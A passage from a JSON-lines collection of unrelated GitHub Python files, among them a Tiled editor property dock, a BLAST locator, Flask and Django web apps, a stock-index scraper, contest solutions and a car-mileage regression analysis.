undoStack.push(RemoveProperty(self.mMapDocument, self.mMapDocument.currentObjects(), name))\n\n def renameProperty(self, *args):\n l = len(args)\n if l==0:\n item = self.mPropertyBrowser.currentItem()\n if (not item):\n return\n oldName = item.property().propertyName()\n dialog = QInputDialog(self.mPropertyBrowser)\n dialog.setInputMode(QInputDialog.TextInput)\n dialog.setLabelText(self.tr(\"Name:\"))\n dialog.setTextValue(oldName)\n dialog.setWindowTitle(self.tr(\"Rename Property\"))\n dialog.open(self.renameProperty)\n elif l==1:\n name = args[0]\n if (name.isEmpty()):\n return\n item = self.mPropertyBrowser.currentItem()\n if (not item):\n return\n oldName = item.property().propertyName()\n if (oldName == name):\n return\n undoStack = self.mMapDocument.undoStack()\n undoStack.push(RenameProperty(self.mMapDocument, self.mMapDocument.currentObjects(), oldName, name))\n\n def retranslateUi(self):\n self.setWindowTitle(self.tr(\"Properties\"))\n self.mActionAddProperty.setText(self.tr(\"Add Property\"))\n self.mActionRemoveProperty.setText(self.tr(\"Remove Property\"))\n self.mActionRenameProperty.setText(self.tr(\"Rename Property\"))\n","repo_name":"theall/Python-Tiled","sub_path":"src/tiled/propertiesdock.py","file_name":"propertiesdock.py","file_ext":"py","file_size_in_byte":8453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"5670186536","text":"\nimport config\n\nfrom pprint import pprint\n\nimport blast\nimport ranges\n\n\ndef locate_sequence(seq, genome, check_uniq=True, evalue_threshold=1e-40,\n hsp_align_len_threshold=None, hsp_identity_threshold=None):\n\n blast_dir = config.CACHE_DIR / 'blast'\n blast_dir.mkdir(exist_ok=True)\n\n res = blast.prepare_blast_db(genome, blast_dir, db_type='nucl',\n skip_if_exists=True)\n db_path = res['db_path']\n\n res = blast.blast_seqs([{'seq': seq, 'name': 'seq'}],\n db_path, blast_program='blastn',\n evalue_threshold=evalue_threshold)\n\n subjects = list(res['seq'].keys())\n if check_uniq:\n if len(subjects) > 1:\n raise RuntimeError('Sequence found in several subjects')\n\n locations = []\n for subject, hsps in res['seq'].items():\n hsps = blast.filter_hsps_by_align_len(hsps, hsp_align_len_threshold)\n hsps = blast.filter_hsps_by_identity(hsps, hsp_identity_threshold)\n\n subject_ranges = []\n for hsp in hsps:\n subject_ranges.append({'chrom': subject,\n 'start': hsp['subject_start'],\n 'end': hsp['subject_end'],\n 'strand': '+' if hsp['subject_strand'] == 1 else '-'})\n subject_ranges = ranges.merge_ranges(subject_ranges)\n for range_ in subject_ranges:\n locations.append({'subject': subject,\n 'start': range_['start'],\n 'end': range_['end'],\n 'strand': range_['strand']\n })\n\n if check_uniq:\n if len(locations) > 1:\n raise RuntimeError('Sequence found in several subjects')\n\n return locations\n\n\nif __name__ == '__main__':\n seq = 'AGACAAGTGGTGAAGAAKAAGATGATATGCAGCAATGCATTTCACCACTTTATATAGCATGGAGTGGATTTCTCCACCTCATTTAATAGTATGAAGTGGAGGCAGCCCCCCTCTACACCTGTCCACTAAGGCCAGCCCACAATCTGATCCCTTTTAATTTTTGCCTTGAGTGGTGGGGCCCATTGGATTAAATCAATCCAAATTAGCCAC'\n locations = locate_sequence(seq, config.TOMATO_GENOME_FASTA, check_uniq=False,\n hsp_align_len_threshold=70, hsp_identity_threshold=95)\n pprint(locations)","repo_name":"bioinfcomav/tomato_haplotype_paper_old","sub_path":"src/locate_seq_using_blast.py","file_name":"locate_seq_using_blast.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"226250619","text":"# coding: utf-8\nfrom flask import Flask\nfrom flask import render_template\n\nimport gspread\nfrom oauth2client.client import SignedJwtAssertionCredentials\nimport json\n\nimport urllib\nimport urllib2\nfrom BeautifulSoup import BeautifulSoup\nimport random\nfrom flask import request\nfrom flask.ext.cache import Cache\n\nfrom save_historians import *\nimport time\nimport random\n\napp = Flask(__name__)\napp.config['CACHE_TYPE'] = 'simple'\napp.cache = Cache(app, config={\n 'CACHE_TYPE': 'filesystem',\n 'CACHE_DIR': 'cache-dir',\n 'CACHE_DEFAULT_TIMEOUT': 922337203685477580,\n 'CACHE_THRESHOLD': 922337203685477580\n })\n\n@app.route(\"/\")\ndef main():\n\treturn 'nginx is running'\n\n@app.route(\"/historyofgreats\")\ndef historyofgreats():\n\tcached = app.cache.get('main')\n\tif cached:\n\t\treturn cached\n\tworksheet = setWorkSheet()\n\tdata = worksheet.get_all_values()\n\tresult = render_template('graphs.html',data=data)\n\tapp.cache.set('main', result)\n\treturn result\n\n@app.route(\"/claim\", methods=[\"POST\"])\ndef claim():\n\tclaimtype = request.form.get('claimtype')\n\tmsg = request.form.get('msg')\n\tresult = saveClaim(claimtype,msg)\n\treturn json.dumps(result)\n\n@app.route(\"/add\", methods=[\"POST\"])\ndef add():\n\tname = request.form.get('name')\n\tresult = addHistory(name)\n\tif result['resultCode'] == '1':\n\t\tapp.cache.delete('main')\n\treturn json.dumps(result)\n\n#Flush Cache\n@app.route(\"/cache_flush/<key_name>\")\ndef cache_flush(key_name):\n\tapp.cache.delete(key_name)\n\treturn 'Done: [ ' + key_name + ' ] is Deleted'\n\n#test\n@app.route(\"/test/<name>\")\ndef test(name):\n\tresult = getinfoWiki(name)\n\treturn json.dumps(result)\n\nif __name__ == \"__main__\":\n \tapp.run('0.0.0.0',8080,debug=True)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"bumkyulee/historyofgreats","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36174493238","text":"from django.http import HttpResponse, Http404\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom datetime import datetime\nfrom blog.models import Article\nfrom .forms import ContactForm, ArticleForm\n\n\ndef accueil(request):\n \"\"\" Afficher tous les articles de notre blog \"\"\"\n articles = Article.objects.all() # Nous sélectionnons tous nos articles\n return render(request, 'blog/accueil.html', {'derniers_articles': articles})\n\n\ndef lire(request, id, slug):\n article = get_object_or_404(Article, id=id, slug=slug)\n return render(request, 'blog/lire.html', {'article': article})\n\n\ndef home(request):\n \"\"\" Exemple de page non valide au niveau HTML pour que l'exemple soit concis \"\"\"\n # return HttpResponse(\"\"\"\n # <html><body><h1>Bienvenue sur mon blog !</h1>\n # <p>Les crêpes bretonnes ça tue des mouettes en plein vol !</p></body></html>\n # \"\"\")\n couleurs = {\n '#FF0000': 'rouge',\n '#ED7F10': 'orange',\n '#FFFF00': 'jaune',\n '#00FF00': 'vert',\n '#0000FF': 'bleu',\n '#4B0082': 'indigo',\n '#660099': 'violet',\n }\n return render(request, 'blog/home.html', {'date': datetime.now(), 'pseudo': \"Test\", 'couleurs': \"\"})\n\n\ndef view_article(request, id_article):\n # Si l'ID est supérieur à 100, nous considérons que l'article n'existe pas\n if id_article > 100:\n return redirect(list_articles, month=12, year=2010)\n\n return render(request, 'blog/article.html', {'id_article': id_article})\n\n\ndef list_articles_by_tag(request, tag):\n return HttpResponse(\n \"<html><body>Vous avez demandé l'article tag {0} !</body></html>\".format(tag)\n )\n\n\ndef list_articles(request, month, year):\n if month == '12' and year == '1900':\n return redirect(home)\n\n return HttpResponse(\n \"<html><body>Vous avez demandé l'article du mois {0} année {1} !</body></html>\".format(month, year)\n )\n\n\ndef addition(request, nombre1, nombre2):\n total = nombre1 + nombre2\n\n # Retourne nombre1, nombre2 et la somme des deux au tpl\n return render(request, 'blog/addition.html', locals())\n\n\ndef pourcentage(request, nombre1, nombre2):\n result = nombre1 / nombre2 * 100\n\n return render(request, 'blog/pourcentage.html', locals())\n\n\ndef contact(request):\n # Construire le formulaire, soit avec les données postées,\n # soit vide si l'utilisateur accède pour la première fois\n # à la page.\n form = ContactForm(request.POST or None)\n # Nous vérifions que les données envoyées sont valides\n # Cette méthode renvoie False s'il n'y a pas de données\n # dans le formulaire ou qu'il contient des erreurs.\n if form.is_valid():\n # Ici nous pouvons traiter les données du formulaire\n sujet = form.cleaned_data['sujet']\n message = form.cleaned_data['message']\n envoyeur = form.cleaned_data['envoyeur']\n renvoi = form.cleaned_data['renvoi']\n\n # Nous pourrions ici envoyer l'e-mail grâce aux données\n # que nous venons de récupérer\n envoi = True\n\n # Quoiqu'il arrive, on affiche la page du formulaire.\n return render(request, 'blog/contact.html', locals())\n\n\ndef article_new(request):\n article = Article()\n form = ArticleForm(request.POST, instance=article)\n if form.is_valid():\n form.save()\n\n # Quoiqu'il arrive, on affiche la page du formulaire.\n return render(request, 'blog/article.html', locals())\n","repo_name":"tiagfernandes/crepes_bretonnes","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71060918088","text":"import sys\nimport itertools\nimport math\nimport collections\nimport functools\n\ndef inputInts():\n return list(map(int, input().split()))\n\ndef cost(L, N):\n res = 0\n for i in range(N-1):\n j = L.index(min(L[i:]))\n res += j - i + 1\n L[i:j+1] = L[i:j+1][::-1]\n return res\n\nT = int(input())\nfor testId in range(T):\n N = int(input())\n L = inputInts()\n\n print(\"Case #{:d}: {:d}\".format(testId+1, cost(L, N)))\n","repo_name":"AurelC2G/practice","sub_path":"googlecodejam/2021/0-Qualif/Reversort/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27069677227","text":"import zmq\n\ncontext = zmq.Context()\nsocket = context.socket(zmq.REP)\nsocket.connect(\"tcp://localhost:5560\")\n\nwhile True:\n msg = socket.recv()\n msg = msg.decode('utf-8')\n print(\"Received request: %s\" % msg)\n socket.send(b\"World\")\n","repo_name":"kawing-chiu/exc","sub_path":"Python/16pyzmq/simple_examples/extended_pub_sub_server.py","file_name":"extended_pub_sub_server.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20532280521","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\nclass Solution(object):\n def searchByIndex(self, head, index):\n if head is None or index < 0:\n return None\n for _ in range(index):\n head = head.next\n if not head:\n return None\n return head\n \n def deleteNode(self, head, index):\n \"\"\"\n input: ListNode head, int index, int value\n return: ListNode\n \"\"\"\n dummy = ListNode(None)\n dummy.next = head\n delete_place = self.searchByIndex(dummy, index)\n if not delete_place or not delete_place.next:\n return dummy.next\n delete_place.next = delete_place.next.next\n return dummy.next","repo_name":"XinheLIU/Coding-Interview","sub_path":"Python/Data Structure/Linear List/Linked List/Operations/Templates/Delete Node At Index.py","file_name":"Delete Node At Index.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34756061709","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('bacster', '0005_bacitem_bac_id'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='bacitem',\n old_name='bac_id',\n new_name='bacid',\n ),\n ]\n","repo_name":"mikkki/web_tool","sub_path":"public/bacster_refactor/bacster/migrations/0006_auto_20150420_1949.py","file_name":"0006_auto_20150420_1949.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15698549668","text":"from __future__ import print_function\n\ndef main():\n #membuat prompt untuk tipe data ineger\n bilanganbulat = int(raw_input(\"maskkan bilangan bulat: \"))\n\n #menggunakan variabel untuk melakukan perhitungan\n hasil = bilanganbulat + 1\n\n #menampilkan nilai variabel\n print(\"Bilangan yang dimasukkan adalah %d\" % bilanganbulat)\n print(\"%d + 1 = %d\" % (bilanganbulat, hasil))\n\nif __name__ == \"__main__\":\n main()","repo_name":"dhanyn10/python","sub_path":"bab-2/input-integer.py","file_name":"input-integer.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34393767132","text":"import requests\n\nfrom bs4 import BeautifulSoup\nfrom db import save_companies\n\nindex_url = \"http://bvmf.bmfbovespa.com.br/indices/ResumoCarteiraTeorica.aspx?Indice=IBOV&idioma=pt-br\"\n\n\nasync def fetch_portfolio(loop):\n \"\"\" Fetch portfolio on BMF bovespa website \"\"\"\n\n # Async web request\n response = await loop.run_in_executor(None, requests.get, index_url)\n index_members = fetch_portfolio_composition(response.text)\n\n # Save companies in the database\n await save_companies(index_members)\n\n\ndef fetch_portfolio_composition(content):\n \"\"\" Fetch IBOVESPA portfolio index composition, basic data from main page. \"\"\"\n index_members = {}\n data = BeautifulSoup(content, \"lxml\")\n\n for tr in data.find_all(\"tr\"):\n try:\n col_vle = [member.text.strip() for member in tr.find_all(\"span\")]\n col_desc = [\"name\", \"type\", \"qty\", \"part\"]\n symbol = col_vle.pop(0)\n\n for i, (value, desc) in enumerate(zip(col_vle, col_desc)):\n if i == 0:\n if not symbol.startswith(\"Quantidade\"):\n index_members[symbol] = {}\n\n index_members[symbol][desc] = value\n except (KeyError, ValueError, IndexError) as e:\n print(\"WARN: could not be able to parse data {}\".format(e))\n continue\n\n return index_members\n","repo_name":"knabben/bov-stream","sub_path":"scrapper/portfolio.py","file_name":"portfolio.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"32851288845","text":"n=int(input())\nm=int(input())\nA=list()\nfor _ in range(0,n):\n i=int(input())\n A.append(i)\nm1=max(A)\nm2=min(A)\na2=m+m1\nk=m\nfor i in range(0,n):\n if(k<=0):\n break\n elif(A[i]<m1):\n k-=(m1-A[i])\n A[i]+=(m1-A[i])\n else:\n continue\na1=max(A)\nif(k<=0):\n pass\n print(a1,a2)\nelse:\n q=k//n\n r=k%n\n if(r==0):\n a1+=q\n else:\n a1+=q+1\n print(a1,a2)\n\n \n\n","repo_name":"Pulkit3108/Codeforces-Problems","sub_path":"Round#510(Div. 2)A.py","file_name":"Round#510(Div. 2)A.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"73810040329","text":"\"\"\"\nCreated on Mon Nov 14 16:38:57 2022\n\n@author: micha\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import figure\nfrom sklearn.model_selection import train_test_split\n\n\nimport os\ncwd = os.getcwd()\nprint(cwd)\nos.chdir(\"C:\\\\Users\\micha\\OneDrive - Dundalk Institute of Technology\\Year Three\\DataScience\\CA2\")\ncar_data= pd.read_csv(\"cleanedData.csv\")\n\n# =============================================================================\n#-----NOTE \n# Originally I had planned to do my predictions based off of the price of the car\n# However upon conducting my search it was prediciting an astounding 1% with a 9000k \n# mean error, so i updated it to instead predict the distance a car has travelled\n# =============================================================================\n\n#############################FUNCTIONS########################################\n#function for calculating the rsquare and rsqaure adjusted\n#takes in the x_train, y_train and model\n#created this function as i realised it was the same code repeated x number of times\ndef modelTraining(x_train, y_train, model):\n raw_sum_sq_errors = sum((y_train.mean() - y_train)**2)\n prediction_sum_sq_errors = sum((predictions_train - y_train)**2)\n rsquared1 = 1-prediction_sum_sq_errors/raw_sum_sq_errors\n \n N= 431 #len(y_train)\n p=1 \n rsquared_adj = 1 - (1-rsquared1)*(N-1)/(N-p-1)\n print(\"Rsquared Regression Model: \" +str(rsquared1))\n print(\"Rsquared Adjusted Regression Model: \" +str(rsquared_adj))\n\ndef meanAverageError(predictions_test, y_test):\n print(\"meanAverageError\")\n mae = sum(abs(predictions_test - y_test))/(len(y_test))\n #Prediction_test_MAE = sum(abs(predictions_test - y_test))/len(y_test)\n return mae\n\n#function that calculates the mean average percentage error by taking in the predicited test\n# and the y_test\ndef meanAveragePercentageError(predictions_test, y_test):\n print(\"meanAveragePercentageError\")\n mape = np.mean(abs((y_test - predictions_test)/y_test))/(len(y_test))\n #mape = np.mean(np.abs((predictions_test- y_test)/y_test))*100\n return mape\n\ndef rmse(predictions_test, y_test):\n print(\"rmse\")\n rmse = (sum((predictions_test - y_test)**2)/len(y_test))**0.5\n return rmse\n######################################################################################\n\n\n\n##########################Feature Engineering##################################\ncar_data.info()\ncar_data.head()\ncar_data.describe()\n\n# =============================================================================\n# # Column Non-Null Count Dtype \n# --- ------ -------------- ----- \n# 0 Index 1929 non-null int64 -- Numerical --- Predictor\n# 1 Name 1158 non-null object -- Categorical --- Predictor\n# 2 Engine 1158 non-null float64 -- Numerical --- Predictor\n# 3 Fuel Type 1158 non-null object -- Categorical --- Predictor\n# 4 KM 1158 non-null float64 -- Numerical --- Response\n# 5 Year 1158 non-null float64 -- Numerical --- Predictor\n# 6 Price 1158 non-null float64 -- Numerical --- Predictor\n# 7 Location 1158 non-null object -- Categorical --- Predictor\n# =============================================================================\ncar_data.isnull().sum()\n\n\n#########Feature Engineering Step 2: Drop certain variables if not required\n\n# Drop Unnamed as unique values\nprint(len(car_data.Index.unique())) \ncar_data.drop('Index', axis = 1, inplace = True) \n\n#Dropped Name as it isnt relevant \ncar_data.drop('Name', axis=1, inplace =True)\n\n#########Feature Engineering Step 3: Construct New Variables if required\n#Change Fuel to numerical\ncar_data['Fuel']=np.where(car_data.FuelType ==\"Petrol\",1,0)\ncar_data.drop('FuelType', axis=1, inplace=True)\ncar_data['CarsFromDublin']=np.where(car_data.Location ==\"Dublin\",1,0)\ncar_data['CarsFromCork']=np.where(car_data.Location ==\"Cork\",1,0)\ncar_data['CarsFromWaterford']=np.where(car_data.Location ==\"Waterford\",1,0)\ncar_data.drop('Location', axis=1, inplace = True)\n\ncar_data.info()\n# =============================================================================\n# No Strong Correlation so no need for Multicolinearity\n# =============================================================================\n\n#Produce scatter and correlation plots\n#Shows there is no strong correlation between price and any other variables\ncorrVals = car_data.corr()\nprint(corrVals)\n\n#Plot of relationships between different car variables\nfigure(num=None, figsize=(8, 6), dpi=80, facecolor='w', edgecolor='k')\nsns.pairplot(car_data)\n\n#Heatmap to show the correlation between the variables\nfigure(num=None, figsize=(8, 6), dpi=80, facecolor='w', edgecolor='k')\nsns.heatmap(car_data.corr(), annot=True, cmap = 'Greens')\nplt.show()\n\n#Box plot for the newly added variables\n#Fuel Types and the distances they travelled\n#Shows that Diesel cars on average travelled more then petrol cars with their IQR\n# ranging from 12-18000 whereas petrol cars are only 5 -13000km travelled travelled\nfigure(num=None, figsize=(8, 8), dpi=80, facecolor='w', edgecolor='k')\nsns.boxplot(car_data.Fuel, car_data.KM)\nplt.title(\"Comparing Petrol Vs Diesel\")\nplt.show()\n\n#CarLocation of the three most common places and the distances travelled\n#Shows cars outside Dublin have travelled longer distances then cars within dublin\n#not surprising considered how frequent public transport is \nfigure(num=None, figsize=(8, 8), dpi=80, facecolor='w', edgecolor='k')\nsns.boxplot(car_data.CarsFromDublin, car_data.KM)\nplt.title(\"Comparing the Distance Travelled of Cars from Dublin vs Other\")\nplt.show()\n\n#Cars from Cork have an IQR of 4-18000km but also have a maxiumum distance of 18000km\n#whereas cars outside cork have a larger maximum distance of 30000km\nfigure(num=None, figsize=(8, 8), dpi=80, facecolor='w', edgecolor='k')\nsns.boxplot(car_data.CarsFromCork, car_data.KM)\nplt.title(\"Comparing the Distance Travelled of Cars from Cork vs Other\")\nplt.show()\n\n#Cars from Waterford are dwarfed in terms of distance travelled when compared to\n#cars outside of the county, they have a very small IQR ranging from 5-9000km with 9000km\n#being the max range as well\nfigure(num=None, figsize=(8, 8), dpi=80, facecolor='w', edgecolor='k')\nsns.boxplot(car_data.CarsFromWaterford, car_data.KM)\nplt.title(\"Comparing the Distance Travelled of Cars from Waterford vs Other\")\nplt.show()\n\ncar_data.info()\n###############REGRESSION MODELLING######################################\n#Step One: Split the Data\n#Split the data between predictor and regression\nx = car_data[['Engine', 'Price', 'Year', 'Fuel', 'CarsFromDublin', 'CarsFromCork', 'CarsFromWaterford']]\ny = car_data['KM'] \n\n#Splitting the Data Set into Training Data and Test Data\n#Splitting it 67/33 train test\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.333)\ny_train \nx_train \n\n#Step Two: Model Selection\n#Fit the variables in order of strongest correlation with KM and calculate adjusted R squared at each step.\n#NOTE: Orginally had this as price but updated to KM due to a better correlation\n#example the strongest correlation for price was cars from cork which had 0.036\n\n# =============================================================================\n# List of Correlation from Strongest to Weakest\n# Year ---- Strongest ----- -0.81\n# Fuel\n# Cars From Waterford\n# Engine\n# Cars From Dublin\n# Cars From Cork\n# Price ---- Weakest ----- 0.0031\n# =============================================================================\nfrom sklearn.linear_model import LinearRegression\nmodel1 = LinearRegression()\nmodel2 = LinearRegression()\nmodel3 = LinearRegression()\nmodel4 = LinearRegression()\nmodel5 = LinearRegression()\nmodel6 = LinearRegression()\nmodel7 = LinearRegression()\n\nprint(\"\")\n#########################Model1###############################\nprint(\"Model One: Year\")\n#Adding Year to the list\nmodel1.fit(x_train[['Year']], y_train)\n\n#the coef is used to describe indicate the relationship of the variable\n#A positive sign indicates that as the predictor variable increases, \n#the response variable decreases\n#A negative sign indicates that as the predictor variable increases,\n#the response variable decreases.\nprint(\"modelOne coef:\" , str(model1.coef_))\n#the expected mean value of Y when all X=0. \nprint(\"modelOne intercept\", str(model1.intercept_))\n#In order to predict the distance travelled you take the intercept value shown above\n# and add it to the coef times by the train value\n#The Year value is negative which means the newer car will have less distance travelled then\n#an older car\n#KM = -13711.97983325* Year + 27757644.55447659 \n\n\n\n#Generate predictions for the train data\npredictions_train = model1.predict(x_train[['Year']])\n\nmodels =[]\nmodels.append(modelTraining(x_train,y_train, model1))\nprint(\"\")\n# =============================================================================\n# Rsquared Regression Model: 0.651396120409319 = 66%\n# Rsquared Adjusted Regression Model: 0.6505835239533967 =65%\n# =============================================================================\n#########################Model2###############################\nprint(\"Model Two: Year & Fuel\")\n#Adding Fuel to the model\nmodel2.fit(x_train[['Year', 'Fuel']], y_train)\nprint(model2.coef_)\nprint(model2.intercept_)\n#KM = 27757644.55447659*Year + -31460.50349713*Fuel + 25809303.114316154\n\npredictions_train = model2.predict(x_train[['Year','Fuel']])\n\nmodels2 =[]\nmodels2.append(modelTraining(x_train,y_train, model2))\nprint(\"\")\n# =============================================================================\n# Rsquared Regression Model: 0.7057400497421817 = 71%\n# Rsquared Adjusted Regression Model: 0.7050541291122101 = 71%\n# =============================================================================\n#########################Model3###############################\nprint(\"Model Three: Year, Fuel & Cars from Waterford\")\n#Adding Cars From Waterford\nmodel3.fit(x_train[['Year', 'Fuel', 'CarsFromWaterford']], y_train)\nprint(model3.coef_)\nprint(model3.intercept_)\n#KM = -12679.44625052*Year + -30912.6078414*Fuel + -3114.48760177*CarsFromWaterFord+ + 25809303.114316154\n\n\npredictions_train = model3.predict(x_train[['Year','Fuel', 'CarsFromWaterford']])\n\nmodels3 =[]\nmodels3.append(modelTraining(x_train,y_train, model3))\nprint(\"\")\n# =============================================================================\n# Rsquared Regression Model: 0.7065682232368578 = 71%\n# Rsquared Adjusted Regression Model: 0.7058842330812327 = 71%\n# =============================================================================\n#########################Model4###############################\nprint(\"Model Four: Year, Fuel, CarsFromWaterford & Engine\")\n#Adding Engine\nmodel4.fit(x_train[['Year', 'Fuel', 'CarsFromWaterford', 'Engine']], y_train)\nprint(model4.coef_)\nprint(model4.intercept_)\n#KM = -12615.67263087*Year + -47356.38403073*Fuel + -10005.13369497*CarsFromWaterFord+ -41033.06957118*Engine + 25622359.89234949\n\npredictions_train = model4.predict(x_train[['Year','Fuel', 'CarsFromWaterford', 'Engine']])\n\nmodels4 =[]\nmodels4.append(modelTraining(x_train,y_train, model4))\nprint(\"\")\n# =============================================================================\n# Rsquared Regression Model: 0.7131489824132342 = 71%\n# Rsquared Adjusted Regression Model: 0.7124803320225891 = 71%\n# =============================================================================\n#########################Model5###############################\nprint(\"Model Five: Year, Fuel, CarsFromWaterford ,Engine & CarsFromDublin\")\n#Adding CarsFromDublin\nmodel5.fit(x_train[['Year', 'Fuel', 'CarsFromWaterford', 'Engine', 'CarsFromDublin']], y_train)\nprint(model5.coef_)\nprint(model5.intercept_)\n#KM = -12657.08675659*Year + -44161.59586249*Fuel + -6472.06942659*CarsFromWaterFord+ -34827.96554519*Engine + 10928.65236702*CarsFromDublin+ 25693263.138610736\n\npredictions_train = model5.predict(x_train[['Year','Fuel', 'CarsFromWaterford', 'Engine', 'CarsFromDublin']])\n \nmodels5 =[]\nmodels5.append(modelTraining(x_train,y_train, model5))\nprint(\"\")\n# =============================================================================\n# Rsquared Regression Model: 0.7180111528492672 = 72%\n# Rsquared Adjusted Regression Model: 0.7173538361892422 = 72%\n# =============================================================================\n#########################Model6###############################\nprint(\"Model Six: Year, Fuel, CarsFromWaterford ,Engine, CarsFromDublin & CarsFromCork \")\n#Adding Cars From Cork\nmodel6.fit(x_train[['Year', 'Fuel', 'CarsFromWaterford', 'Engine', 'CarsFromDublin', 'CarsFromCork']], y_train)\nprint(model6.coef_)\nprint(model6.intercept_)\n#KM = -12600.67338118*Year + -45398.82843539*Fuel + -7390.22010528*CarsFromWaterFord+ -36350.50121446*Engine + 10022.66878778*CarsFromDublin + -4994.13462423*CarsFromCork+ 25582857.487180654\n\n\npredictions_train = model6.predict(x_train[['Year','Fuel', 'CarsFromWaterford', 'Engine', 'CarsFromDublin', 'CarsFromCork']])\n\nmodel6 =[]\nmodel6.append(modelTraining(x_train,y_train, model6))\nprint(\"\")\n# =============================================================================\n# Rsquared Regression Model: 0.718143997053015 = 72%\n# Rsquared Adjusted Regression Model: 0.7174869900531387 =72%\n# =============================================================================\n#########################Model7###############################\nprint(\"Model Seven: Year, Fuel, CarsFromWaterford ,Engine, CarsFromDublin ,CarsFromCork & Price\")\n\n#Adding Price\nmodel7.fit(x_train[['Year', 'Fuel', 'CarsFromWaterford', 'Engine', 'CarsFromDublin', 'CarsFromCork', 'Price']], y_train)\nprint(model7.coef_)\nprint(model7.intercept_)\n#KM = -1.26133024e+04*Year + -4.53991288e+04*Fuel + -7.07015723e+03*CarsFromWaterFord+ 3.62781210e+04*Engine + 1.00202064e+04*CarsFromDublin + -4.81874893e+03*CarsFromCork+ -9.28771300e-02*Price+ 25609662.63067534\n\npredictions_train = model7.predict(x_train[['Year','Fuel', 'CarsFromWaterford', 'Engine', 'CarsFromDublin', 'CarsFromCork', 'Price']])\nmodels =[]\nmodels.append(modelTraining(x_train,y_train, model7))\n\n#Displaying coefficients by placing them in a DataFrame.\noutput = pd.DataFrame(model7.coef_, ['Year COEFF', 'Fuel COEFF', 'CarsFromWaterford COEFF', 'Engine COEFF', 'CarsFromDublin COEFF', 'CarsFromCork COEFF', 'Price COEFF'], columns = ['Coeff'])\nprint(output) \n# =============================================================================\n# Rsquared Regression Model: 0.7182429375528141 = 72%\n# Rsquared Adjusted Regression Model: 0.7175861611834733 = 72%\n# =============================================================================\n#Coeff for the final model\n# =============================================================================\n# Coeff\n# Year COEFF -12958.666908 ---- As the Year(when a car is made)Increases the KM decreases\n# Fuel COEFF -41601.173508 ---- Not sure how to desribe this one\n# CarsFromWaterford COEFF -5537.422575 ---- The more cars from Waterford KM descreases \n# Engine COEFF -29953.244097 ---- As the Engine size icreases the KM decreases\n# CarsFromDublin COEFF 12538.069636 ---- The more cars from Dublin KM increases\n# CarsFromCork COEFF 2508.440712 ---- The more cars from Cork KM increases\n# Price COEFF 0.223042 ---- Does not have an effect as its near 0?\n# =============================================================================\n# Interesting to plot the errors for the actual values\nplt.scatter(y_train, predictions_train)\np1 = max(max(predictions_train), max(y_train))\np2 = min(min(predictions_train), min(y_train))\nplt.plot([p1, p2], [p1, p2], 'b-')\nplt.show() # Should be close to a straight line\n\nplt.scatter(y_train, predictions_train - y_train)\nplt.show()\n\n\n#Step 3: Model Evaluation Based on TEST set.\n#Based of the results of the previous Step, I will be using model7 as model5, model6 and \n#model7 had an adjusted Rsquare of 72%\n\n#MAE - Mean Absolute Error\n#MAPE - Mean Absolute Percentage Error\n#RMSE - Root Mean Square Error\n\n\n\n### For some reason the results of the MAPE & RMSE are incorrect,\n### I have tried googling solutions for this as well as reviewing previous \n### Class examples and I am unable to see a solution for this\n\npredictions_test = model5.predict(x_test[['Year','Fuel', 'CarsFromWaterford', 'Engine', 'CarsFromDublin']])\nprint(len(y_test))\n# =============================================================================\n\n\nprint(meanAverageError(predictions_test, y_test))\nprint(meanAveragePercentageError(predictions_test, y_test))\n#print(rmse(predictions_test, y_test))\n# =============================================================================\n\n\n\n\n\n# =============================================================================\n###Plot prediction results\n#First plot the y test values and the predictions for the model\n#This SHOULD BE close to a straight line\nfigure(num=None, figsize=(8, 8), dpi=80, facecolor='w', edgecolor='k')\nplt.scatter(y_test, predictions_test)\np1 = max(max(predictions_test), max(y_test))\np2 = min(min(predictions_test), min(y_test))\nplt.plot([p1, p2], [p1, p2], 'b-')\nplt.title(\"Predictions v Actual Test Values\")\nplt.xlabel(\"Actual values\")\nplt.ylabel(\"Predicted Values\")\nplt.show() \n#Looking at this graph you can see that some of the points sit on the fitted line\n#with many of these plots sitting just under or slightly over suggesting the predicted\n#values are nearly accurate to the actual values and in some cases spot on\n\nfigure(num=None, figsize=(8, 8), dpi=80, facecolor='w', edgecolor='k')\nplt.scatter(y_test, predictions_test - y_test)\nplt.title(\"Errors v Actual Test Values\")\nplt.xlabel(\"Actual 